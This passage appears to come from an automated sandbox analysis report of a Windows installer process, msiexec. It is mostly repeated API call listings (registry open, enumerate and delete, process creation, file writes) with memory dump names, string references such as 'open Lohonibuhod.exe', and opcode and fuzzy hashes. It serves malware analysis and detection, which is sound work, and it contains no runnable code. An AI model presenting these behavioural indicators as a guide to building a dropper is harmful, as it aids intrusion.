            • RegSetValueExA.ADVAPI32(?,?,?,?,fd ,00000000), ref: 0040239A
            • RegCloseKey.ADVAPI32(?), ref: 0040247D
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID: fd
            • API String ID: 1356686001-2313478379
            • Opcode ID: ef42d4d025d292edcb994c00818a1b6489968a05de1bb2656c7f8993eebe469d
            • Instruction ID: 74c2b7e5efa1a9b7d251dd878628ee018497e02546d33d1ea7114f4406d6c15c
            • Opcode Fuzzy Hash: ef42d4d025d292edcb994c00818a1b6489968a05de1bb2656c7f8993eebe469d
            • Instruction Fuzzy Hash: 721160B1E00209BFEB10AFA5DE89EAF767CFB40398F10453AF901B71D0D6B85D019669
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
            • RegCloseKey.ADVAPI32(?), ref: 00402A9C
            • RegCloseKey.ADVAPI32(?), ref: 00402AC1
            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
            • Instruction ID: 324dab2b24170647655e9dcbeda369d8ff673eed47d89bab0de13a8960c84090
            • Opcode Fuzzy Hash: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
            • Instruction Fuzzy Hash: 4F115675A00008FFEF31AF91DE49DAB7B6DEB40384B104436FA05B10A0DBB59E51AE69
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: c11a1326f806ce2ab61e5a3f1dc978ac0e24045f1205bc6e497a34a900bec79e
            • Instruction ID: f89edaf4e673e5a696cf4c500be88082f9c29b5fdabb6c66a10e118bddb835aa
            • Opcode Fuzzy Hash: c11a1326f806ce2ab61e5a3f1dc978ac0e24045f1205bc6e497a34a900bec79e
            • Instruction Fuzzy Hash: 71F01DB2E04105BFD700EBA4EE89DAFB7BDEB44345B104576F602F6190C678AD018B69
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(00429FE0,00429FE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004044B7,000000DF,0000040F,00000400,00000000), ref: 00404625
            • wsprintfA.USER32 ref: 0040462D
            • SetDlgItemTextA.USER32(?,00429FE0), ref: 00404640
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
            • Instruction ID: a73c68329ee831a229c644748369bffc84c82a565a353c3d841dc2820e0c3950
            • Opcode Fuzzy Hash: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
            • Instruction Fuzzy Hash: 9911D0737001243BDB10A66D9C46EEF329ADBC6334F14023BFA25F61D1E9388C5286E8
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
            • SendMessageA.USER32 ref: 00401C25
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
            • Instruction ID: e870f9960eb541ab862ab70d99fa676f0883abea00e9f1964bf1c40a5587cb5b
            • Opcode Fuzzy Hash: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
            • Instruction Fuzzy Hash: 3B21C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE8,Error launching installer), ref: 00405291
            • CloseHandle.KERNEL32(?), ref: 0040529E
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040526C
            • Error launching installer, xrefs: 0040527F
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CloseCreateHandleProcess
            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
            • API String ID: 3712363035-3894416041
            • Opcode ID: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
            • Instruction ID: 9c205d3d1494e9e4afb0e3639077779a104ecf70f113e6d393e41fe649cd8d97
            • Opcode Fuzzy Hash: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
            • Instruction Fuzzy Hash: FBE0ECB4A04209ABEB00EF64ED09D7B7BBCEB00304B408522A911E2290D778E410CEB9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405505
            • CharPrevA.USER32(?,00000000), ref: 0040550E
            • lstrcatA.KERNEL32(?,00409010), ref: 0040551F
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054FF
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-4017390910
            • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
            • Instruction ID: dfec000a3f5bf2671270dd29e8f8c50a5f72ee918dd093ba8f25731816a648b4
            • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
            • Instruction Fuzzy Hash: FCD0A972705A307ED2022A19AC06F8F2A88CF17301B044822F100B62D2C23C9E418FFE
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
              • Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
            • String ID:
            • API String ID: 1404258612-0
            • Opcode ID: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
            • Instruction ID: ac83c8b0d38e5b491d5bd27050ffdb4091974a4b49ad9b19d675067d3fb65d11
            • Opcode Fuzzy Hash: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
            • Instruction Fuzzy Hash: 201148B2900108BFDB01EFA5D981DAEBBB9EF04344B24807AF505F61E1D7389A54DB28
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CharNext
            • String ID: ES@
            • API String ID: 3213498283-1851447614
            • Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
            • Instruction ID: f60ec20427defc95a9886ae099bd540e39d30c8fbbaad3333d1940da6ed1a81e
            • Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
            • Instruction Fuzzy Hash: F8F0A7A2D44B25B6E73222A84C44B6B6BADDB55711F244437E200B61D597B84C828FBA
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: CapsCreateDeviceFontIndirect
            • String ID:
            • API String ID: 3272661963-0
            • Opcode ID: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
            • Instruction ID: 580b179190550232f88f4ba5e52f5296c98f8c4b0afe68c870f47754878f2485
            • Opcode Fuzzy Hash: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
            • Instruction Fuzzy Hash: 68F044F1A45342AEE702A7B0AE4B7993B649725309F100436F545BA1E2C5BC00149B7F
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DestroyWindow.USER32 ref: 00402BD1
            • GetTickCount.KERNEL32(00000000,00402D9E,00000001), ref: 00402BEF
            • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
            • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Window$CountCreateDestroyDialogParamShowTick
            • String ID:
            • API String ID: 2102729457-0
            • Opcode ID: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
            • Instruction ID: df45f881ccb5ca36463c1a09230da8cf23750fca8468dec1cd15007da7f5e5e8
            • Opcode Fuzzy Hash: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
            • Instruction Fuzzy Hash: 22F0F430A09120EBC6716F95FD4C99B7F64E704B157504437F001B55F5D67878829B9D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?), ref: 00402073
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409378,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: ByteCharCreateInstanceMultiWide
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 123533781-2935972921
            • Opcode ID: f64a4fc3f0a20e18ebbd393d0a0c832ccbaabc0cf5e8d3ee259825c4e2553bf8
            • Instruction ID: ee874f8c2dec57c4877f78095a0f9dac743c80c93ea62094aeb2a8065092a27c
            • Opcode Fuzzy Hash: f64a4fc3f0a20e18ebbd393d0a0c832ccbaabc0cf5e8d3ee259825c4e2553bf8
            • Instruction Fuzzy Hash: 07417D75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowTextA.USER32(00000000,0042E360), ref: 004038B6
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: TextWindow
            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
            • API String ID: 530164218-1176120985
            • Opcode ID: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
            • Instruction ID: f58d08b88b77c55e92e539ad5181c9965f6bbcffbd0d008a8b371c472e4a47a6
            • Opcode Fuzzy Hash: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
            • Instruction Fuzzy Hash: 9311D176B001009BC734EF56DC809737BADEB8471636881BFEC02A7390D639A8038A98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsWindowVisible.USER32(?), ref: 00404D30
            • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D9E
              • Part of subcall function 00403E0A: SendMessageA.USER32 ref: 00403E1C
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
            • Instruction ID: b16bf2df46199d4e0f4b20eb531931f7d117dfa55111be6f57691eac5a9fa7e0
            • Opcode Fuzzy Hash: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
            • Instruction Fuzzy Hash: 25114F71600218BBDB219F52DC41AAB3B69AF84365F00813FFA04B91E1C37D8D51CFA9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
            • WriteFile.KERNEL32(00000000,?,open Lohonibuhod.exe,00000000,?), ref: 004024FB
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
            • Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_400000_msiexec.jbxd
            Similarity
            • API ID: FileWritelstrlen
            • String ID: open Lohonibuhod.exe
            • API String ID: 427699356-432908772
